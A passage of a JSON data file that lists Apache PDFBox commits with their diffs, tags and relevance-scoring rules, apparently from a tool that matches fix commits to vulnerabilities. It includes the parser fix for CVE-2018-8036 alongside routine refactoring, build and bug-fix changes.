c7302ca1a..9b0c1fc57 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/fdf/FDFAnnotationPolyline.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/fdf/FDFAnnotationPolyline.java", - "@@ -164,6 +164,3 @@ public class FDFAnnotationPolyline extends FDFAnnotation", - " {", - "- if (style == null)", - "- {", - "- style = PDAnnotationLine.LE_NONE;", - "- }", - "+ String actualStyle = style == null ? PDAnnotationLine.LE_NONE : style;", - " COSArray array = (COSArray) annot.getDictionaryObject(COSName.LE);", - "@@ -172,3 +169,3 @@ public class FDFAnnotationPolyline extends FDFAnnotation", - " array = new COSArray();", - "- array.add(COSName.getPDFName(style));", - "+ array.add(COSName.getPDFName(actualStyle));", - " array.add(COSName.getPDFName(PDAnnotationLine.LE_NONE));", - "@@ -178,3 +175,3 @@ public class FDFAnnotationPolyline extends FDFAnnotation", - " {", - "- array.setName(0, style);", - "+ array.setName(0, actualStyle);", - " }", - "@@ -206,6 +203,3 @@ public class FDFAnnotationPolyline extends FDFAnnotation", - " {", - "- if (style == null)", - "- {", - "- style = PDAnnotationLine.LE_NONE;", - "- }", - "+ String actualStyle = style == null ? PDAnnotationLine.LE_NONE : style;", - " COSArray array = (COSArray) annot.getDictionaryObject(COSName.LE);", - "@@ -215,3 +209,3 @@ public class FDFAnnotationPolyline extends FDFAnnotation", - " array.add(COSName.getPDFName(PDAnnotationLine.LE_NONE));", - "- array.add(COSName.getPDFName(style));", - "+ array.add(COSName.getPDFName(actualStyle));", - " annot.setItem(COSName.LE, array);", - "@@ -220,3 +214,3 @@ public class FDFAnnotationPolyline extends FDFAnnotation", - " {", - "- array.setName(1, style);", - "+ array.setName(1, actualStyle);", - " }", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationLine.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationLine.java", - "index 191fde680..c188fcf12 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationLine.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationLine.java", - "@@ -159,6 +159,3 @@ public class PDAnnotationLine extends PDAnnotationMarkup", - " {", - "- if (style == null)", - "- {", - "- style = LE_NONE;", - "- }", - "+ String actualStyle = style == null ? PDAnnotationLine.LE_NONE : style;", - " COSBase base = getCOSObject().getDictionaryObject(COSName.LE);", - "@@ -168,4 +165,4 @@ public class PDAnnotationLine extends PDAnnotationMarkup", - " array = new COSArray();", - "- array.add(COSName.getPDFName(style));", - "- array.add(COSName.getPDFName(LE_NONE));", - "+ array.add(COSName.getPDFName(actualStyle));", - "+ array.add(COSName.getPDFName(PDAnnotationLine.LE_NONE));", - " getCOSObject().setItem(COSName.LE, array);", - "@@ -175,3 +172,3 @@ public class PDAnnotationLine extends PDAnnotationMarkup", - " array = (COSArray) base;", - "- array.setName(0, style);", - "+ array.setName(0, actualStyle);", - " }", - "@@ -201,6 +198,3 @@ public class PDAnnotationLine extends PDAnnotationMarkup", - " {", - "- if (style == null)", - "- {", - "- style = LE_NONE;", - "- }", - "+ String actualStyle = style == null ? PDAnnotationLine.LE_NONE : style;", - " COSBase base = getCOSObject().getDictionaryObject(COSName.LE);", - "@@ -210,4 +204,4 @@ public class PDAnnotationLine extends PDAnnotationMarkup", - " array = new COSArray();", - "- array.add(COSName.getPDFName(LE_NONE));", - "- array.add(COSName.getPDFName(style));", - "+ array.add(COSName.getPDFName(PDAnnotationLine.LE_NONE));", - "+ array.add(COSName.getPDFName(actualStyle));", - " getCOSObject().setItem(COSName.LE, array);", - "@@ -217,3 +211,3 @@ public class PDAnnotationLine extends PDAnnotationMarkup", - " array = (COSArray) base;", - "- array.setName(1, style);", - "+ array.setName(1, actualStyle);", - " }", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolyline.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolyline.java", - "index b5833f84a..327d1fdca 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolyline.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolyline.java", - "@@ -22,3 +22,2 @@ import org.apache.pdfbox.cos.COSName;", - " import org.apache.pdfbox.pdmodel.graphics.color.PDColor;", - "-import static org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationLine.LE_NONE;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.handlers.PDAppearanceHandler;", - "@@ -64,6 +63,3 @@ public class PDAnnotationPolyline extends PDAnnotationMarkup", - " {", - "- if (style == null)", - "- {", - "- style = LE_NONE;", - "- }", - "+ String actualStyle = style == null ? PDAnnotationLine.LE_NONE : style;", - " COSBase base = getCOSObject().getDictionaryObject(COSName.LE);", - "@@ -73,4 +69,4 @@ public class PDAnnotationPolyline extends PDAnnotationMarkup", - " array = new COSArray();", - "- array.add(COSName.getPDFName(style));", - "- array.add(COSName.getPDFName(LE_NONE));", - "+ array.add(COSName.getPDFName(actualStyle));", - "+ array.add(COSName.getPDFName(PDAnnotationLine.LE_NONE));", - " getCOSObject().setItem(COSName.LE, array);", - "@@ -80,3 +76,3 @@ public class PDAnnotationPolyline extends PDAnnotationMarkup", - " array = (COSArray) base;", - "- array.setName(0, style);", - "+ array.setName(0, actualStyle);", - " }", - "@@ -94,5 +90,5 @@ public class PDAnnotationPolyline extends PDAnnotationMarkup", - " {", - "- return ((COSArray) base).getName(0, LE_NONE);", - "+ return ((COSArray) base).getName(0, PDAnnotationLine.LE_NONE);", - " }", - "- return LE_NONE;", - "+ return PDAnnotationLine.LE_NONE;", - " }", - "@@ -106,6 +102,3 @@ public class PDAnnotationPolyline extends PDAnnotationMarkup", - " {", - "- if (style == null)", - "- {", - "- style = LE_NONE;", - "- }", - "+ String actualStyle = style == null ? PDAnnotationLine.LE_NONE : style;", - " COSBase base = getCOSObject().getDictionaryObject(COSName.LE);", - "@@ -115,4 +108,4 @@ public class PDAnnotationPolyline extends PDAnnotationMarkup", - " array = new COSArray();", - "- array.add(COSName.getPDFName(LE_NONE));", - "- array.add(COSName.getPDFName(style));", - "+ array.add(COSName.getPDFName(PDAnnotationLine.LE_NONE));", - "+ array.add(COSName.getPDFName(actualStyle));", - " getCOSObject().setItem(COSName.LE, array);", - "@@ -122,3 +115,3 @@ public class PDAnnotationPolyline extends PDAnnotationMarkup", - " array = (COSArray) base;", - "- array.setName(1, style);", - "+ array.setName(1, actualStyle);", - " }", - "@@ -136,5 +129,5 @@ public class PDAnnotationPolyline extends PDAnnotationMarkup", - " {", - "- return ((COSArray) base).getName(1, LE_NONE);", - "+ return ((COSArray) base).getName(1, PDAnnotationLine.LE_NONE);", - " }", - "- return LE_NONE;", - "+ return PDAnnotationLine.LE_NONE;", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/fdf/FDFAnnotationLine.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/fdf/FDFAnnotationPolyline.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationLine.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolyline.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "dbc072811f7bdbe50e38a0ae8199c674d74f43f0" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "17d72c0e1d21522e7defa4e711a0c475d71c9aa4", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1532270555, - "hunks": 5, - "message": "PDFBOX-4271: set versions in the parent, as suggested by Karl Heinz Marbaise git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1836443 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/fontbox/pom.xml b/fontbox/pom.xml", - "index 3da486720..dbb81390a 100644", - "--- a/fontbox/pom.xml", - "+++ b/fontbox/pom.xml", - "@@ -72,3 +72,2 @@", - " download-maven-plugin", - "- 1.3.0", - " ", - "diff --git a/parent/pom.xml b/parent/pom.xml", - "index 07a60c503..46e14e21e 100644", - "--- a/parent/pom.xml", - "+++ b/parent/pom.xml", - "@@ -257,3 +257,14 @@", - " \t ", - "-\t ", - "+ ", - "+ ", - "+ com.googlecode.maven-download-plugin", - "+ download-maven-plugin", - "+ 1.3.0", - "+ ", - "+ ", - "+ com.googlecode.maven-download-plugin", - "+ ", - "+ maven-download-plugin", - "+ 1.1.0", - "+ ", - " ", - "diff --git a/pdfbox/pom.xml b/pdfbox/pom.xml", - "index 6d21fa37b..eebe9402f 100644", - "--- a/pdfbox/pom.xml", - "+++ b/pdfbox/pom.xml", - "@@ -186,3 +186,2 @@", - " download-maven-plugin", - "- 1.3.0", - " ", - "diff --git a/preflight/pom.xml b/preflight/pom.xml", - "index c8f3d5402..f62a84d9e 100644", - "--- a/preflight/pom.xml", - "+++ b/preflight/pom.xml", - "@@ -111,3 +111,2 @@", - " maven-download-plugin", - "- 1.1.0", - " ", - "@@ -160,3 +159,2 @@", - " \t\t\t\t\t\t\t\t\t\tdownload-maven-plugin", - "-\t\t\t\t\t\t\t\t\t\t[1.3.0,)", - " \t\t\t\t\t\t\t\t\t\t" - ], - "changed_files": [ - "fontbox/pom.xml", - "parent/pom.xml", - "pdfbox/pom.xml", - "preflight/pom.xml" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4271": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "496f0946198ff9dce2dbb3aabb58724e885fb540" - ] - ], - "tags": [ - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4271", - "relevance": 2 - } - ] - }, - { - "commit_id": "ac08d027fbe45be455b955e0977ba324926e6e71", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1527271355, - "hunks": 1, - "message": "PDFBOX-4227: be resilent if XMP metadata can't be read git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1832260 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", - "index ccc1fe5d1..da0ca4cd7 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", - "@@ -656,6 +656,14 @@ public class PDFMergerUtility", - " {", - "- PDStream newStream = new PDStream(destination, srcMetadata.createInputStream(), (COSName) null); ", - "- mergeInto(srcMetadata, newStream.getCOSObject(), ", - "- new HashSet(Arrays.asList(COSName.FILTER, COSName.LENGTH))); ", - "- destCatalog.getCOSObject().setItem(COSName.METADATA, newStream);", - "+ try", - "+ {", - "+ PDStream newStream = new PDStream(destination, srcMetadata.createInputStream(), (COSName) null); ", - "+ mergeInto(srcMetadata, newStream.getCOSObject(), ", - "+ new HashSet(Arrays.asList(COSName.FILTER, COSName.LENGTH))); ", - "+ destCatalog.getCOSObject().setItem(COSName.METADATA, newStream);", - "+ }", - "+ catch (IOException ex)", - "+ {", - "+ // PDFBOX-4227 cleartext XMP stream with /Flate ", - "+ LOG.error(\"Metadata skipped because it could not be read\", ex);", - "+ }", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4227": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "1cfd4aaa7c4967b693d34d7e38c06e188b0cae4f" - ] - ], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4227", - "relevance": 2 - } - ] - }, - { - "commit_id": "0e0252e99cbc84d2d9e3cc3e02fe76e292b4cf11", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530728532, - "hunks": 8, - "message": "PDFBOX-4242: register fonts and close them when closing the document to avoid memory leaks git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835076 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java", - "index 95408142c..b60323fcf 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java", - "@@ -37,2 +37,3 @@ import org.apache.commons.logging.Log;", - " import org.apache.commons.logging.LogFactory;", - "+import org.apache.fontbox.ttf.TrueTypeFont;", - " import org.apache.pdfbox.cos.COSArray;", - "@@ -136,3 +137,6 @@ public class PDDocument implements Closeable", - " private final Set fontsToSubset = new HashSet<>();", - "- ", - "+", - "+ // fonts to close when closing document", - "+ private final Set fontsToClose = new HashSet<>();", - "+", - " // Signature interface", - "@@ -875,2 +879,14 @@ public class PDDocument implements Closeable", - "+ /**", - "+ * For internal PDFBox use when creating PDF documents: register a TrueTypeFont to make sure it", - "+ * is closed when the PDDocument is closed to avoid memory leaks. Users don't have to call this", - "+ * method, it is done by the appropriate PDFont classes.", - "+ *", - "+ * @param ttf", - "+ */", - "+ public void registerTrueTypeFont(TrueTypeFont ttf)", - "+ {", - "+ fontsToClose.add(ttf);", - "+ }", - "+", - " /**", - "@@ -1415,2 +1431,8 @@ public class PDDocument implements Closeable", - "+ // close fonts", - "+ for (TrueTypeFont ttf : fontsToClose)", - "+ {", - "+ firstException = IOUtils.closeAndLogException(ttf, LOG, \"TrueTypeFont\", firstException);", - "+ }", - "+", - " // rethrow first exception to keep method contract", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", - "index 843a8eb0c..164a4930f 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", - "@@ -94,6 +94,15 @@ public class PDType0Font extends PDFont implements PDVectorFont", - " /**", - "- * Private. Creates a new TrueType font for embedding.", - "- */", - "+ * Private. Creates a new PDType0Font font for embedding.", - "+ *", - "+ * @param document", - "+ * @param ttf", - "+ * @param embedSubset", - "+ * @param closeTTF whether to close the ttf parameter after embedding. Must be true when the ttf", - "+ * parameter was created in the load() method, false when the ttf parameter was passed to the", - "+ * load() method.", - "+ * @param vertical", - "+ * @throws IOException", - "+ */", - " private PDType0Font(PDDocument document, TrueTypeFont ttf, boolean embedSubset,", - "- boolean closeOnSubset, boolean vertical) throws IOException", - "+ boolean closeTTF, boolean vertical) throws IOException", - " {", - "@@ -111,3 +120,3 @@ public class PDType0Font extends PDFont implements PDVectorFont", - " fetchCMapUCS2();", - "- if (closeOnSubset)", - "+ if (closeTTF)", - " {", - "@@ -116,2 +125,3 @@ public class PDType0Font extends PDFont implements PDVectorFont", - " this.ttf = ttf;", - "+ document.registerTrueTypeFont(ttf);", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4242": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "d837e66f3517abb4309dece5ce499c2118203a27" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4242", - "relevance": 2 - } - ] - }, - { - "commit_id": "fb480219b01736337995b191258442e0d94743a6", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530035135, - "hunks": 2, - "message": "PDFBOX-4253: cache bounds values git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834453 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/function/PDFunctionType3.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/function/PDFunctionType3.java", - "index 594cd8d1c..f5c128718 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/function/PDFunctionType3.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/function/PDFunctionType3.java", - "@@ -36,3 +36,4 @@ public class PDFunctionType3 extends PDFunction", - " private PDFunction[] functionsArray = null;", - "- ", - "+ private float[] boundsValues = null;", - "+", - " /**", - "@@ -90,3 +91,6 @@ public class PDFunctionType3 extends PDFunction", - " {", - "- float[] boundsValues = getBounds().toFloatArray();", - "+ if (boundsValues == null)", - "+ {", - "+ boundsValues = getBounds().toFloatArray();", - "+ }", - " int boundsSize = boundsValues.length;" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/function/PDFunctionType3.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4253": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "a7b91102c78d3e88873a9f8d57f33e062331aba4" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4253", - "relevance": 2 - } - ] - }, - { - "commit_id": "5753aa286c4124bf1ec8c20a7e46b75b91eb4ec7", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1532632202, - "hunks": 2, - "message": "PDFBOX-4279: avoid NPE with empty annotation color that have no colorspace git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1836753 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDColor.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDColor.java", - "index 38af5c8f7..18da9a0b0 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDColor.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDColor.java", - "@@ -115,5 +115,7 @@ public final class PDColor", - " {", - "- if (colorSpace instanceof PDPattern)", - "+ if (colorSpace instanceof PDPattern || colorSpace == null)", - " {", - " // colorspace of the pattern color isn't known, so just clone", - "+ // null colorspace can happen with empty annotation color", - "+ // see PDFBOX-3351-538928-p4.pdf", - " return components.clone();" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDColor.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4279": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "e62a364cf83e55e5bcb0f5f9e5bc2ea384b95951" - ] - ], - "tags": [ - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4279", - "relevance": 2 - } - ] - }, - { - "commit_id": "68952e75f85d03f2dfa536d60b1cce7dfe842353", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1523986011, - "hunks": 5, - "message": "PDFBOX-4192: support subsampling git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1829375 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java b/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java", - "index 4e5a881d7..311e3213a 100644", - "--- a/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java", - "+++ b/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java", - "@@ -54,2 +54,3 @@ public final class PDFToImage", - " private static final String TIME = \"-time\";", - "+ private static final String SUBSAMPLING = \"-subsampling\";", - "@@ -100,2 +101,3 @@ public final class PDFToImage", - " boolean showTime = false;", - "+ boolean subsampling = false;", - " try", - "@@ -187,2 +189,6 @@ public final class PDFToImage", - " }", - "+ else if( args[i].equals( SUBSAMPLING ) )", - "+ {", - "+ subsampling = true;", - "+ }", - " else", - "@@ -251,2 +257,3 @@ public final class PDFToImage", - " PDFRenderer renderer = new PDFRenderer(document);", - "+ renderer.setSubsamplingAllowed(subsampling);", - " for (int i = startPage - 1; i < endPage; i++)", - "@@ -303,2 +310,3 @@ public final class PDFToImage", - " + \" -time : Prints timing information to stdout\\n\"", - "+ + \" -subsampling : Activate subsampling (for PDFs with huge images)\\n\"", - " + \" : The PDF document to use\\n\";" - ], - "changed_files": [ - "tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4192": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "540cc8ff9fc28f02a11b177c5fc036bebbbbf9ca" - ] - ], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4192", - "relevance": 2 - } - ] - }, - { - "commit_id": "1e43aab90bde9264843e1271c49c1810f243b228", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1529610318, - "hunks": 4, - "message": "PDFBOX-4071, PDFBOX-4251: fix DoS (OOM) Vulnerability (CVE-2018-8036) + test git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834048 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/fontbox/src/main/java/org/apache/fontbox/afm/AFMParser.java b/fontbox/src/main/java/org/apache/fontbox/afm/AFMParser.java", - "index aaeb70954..5d89b4658 100644", - "--- a/fontbox/src/main/java/org/apache/fontbox/afm/AFMParser.java", - "+++ b/fontbox/src/main/java/org/apache/fontbox/afm/AFMParser.java", - "@@ -910,5 +910,7 @@ public class AFMParser", - " //now read the data", - "- while( !isEOL(nextByte = input.read()) )", - "+ nextByte = input.read();", - "+ while (nextByte != -1 && !isEOL(nextByte))", - " {", - "- buf.append( (char)nextByte );", - "+ buf.append((char) nextByte);", - "+ nextByte = input.read();", - " }", - "@@ -937,5 +939,7 @@ public class AFMParser", - " //now read the data", - "- while( !isWhitespace(nextByte = input.read()) )", - "+ nextByte = input.read();", - "+ while (nextByte != -1 && !isWhitespace(nextByte))", - " {", - "- buf.append( (char)nextByte );", - "+ buf.append((char) nextByte);", - "+ nextByte = input.read();", - " }" - ], - "changed_files": [ - "fontbox/src/main/java/org/apache/fontbox/afm/AFMParser.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "", - "PDFBOX-4251": "" - }, - "ghissue_refs": {}, - "cve_refs": [ - "CVE-2018-8036" - ], - "twins": [ - [ - "no-tag", - "a994cabc705ea0366de7edab1271248cf71e1221" - ], - [ - "no-tag", - "0ee190856c3b67f5d09d6e32d00951930a0dea21" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "SEC_KEYWORDS_IN_MESSAGE", - "message": "The commit message contains some security-related keywords: vulnerability, dos", - "relevance": 4 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: parse", - "relevance": 4 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071, PDFBOX-4251", - "relevance": 2 - } - ] - }, - { - "commit_id": "9409814b833b98a1e0990b961517bf369787640d", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1532621990, - "hunks": 1, - "message": "PDFBOX-4279: copyOf instead of clone in case array is too small, avoids ArrayIndexOutOfBoundsException later git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1836742 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDColor.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDColor.java", - "index c966f4dd9..38af5c8f7 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDColor.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDColor.java", - "@@ -115,3 +115,9 @@ public final class PDColor", - " {", - "- return components.clone();", - "+ if (colorSpace instanceof PDPattern)", - "+ {", - "+ // colorspace of the pattern color isn't known, so just clone", - "+ return components.clone();", - "+ }", - "+ // PDFBOX-4279: copyOf instead of clone in case array is too small", - "+ return Arrays.copyOf(components, colorSpace.getNumberOfComponents());", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDColor.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4279": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "8fa5c0d5ae2480c47a362529f3c3c0a3dd09e370" - ] - ], - "tags": [ - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": 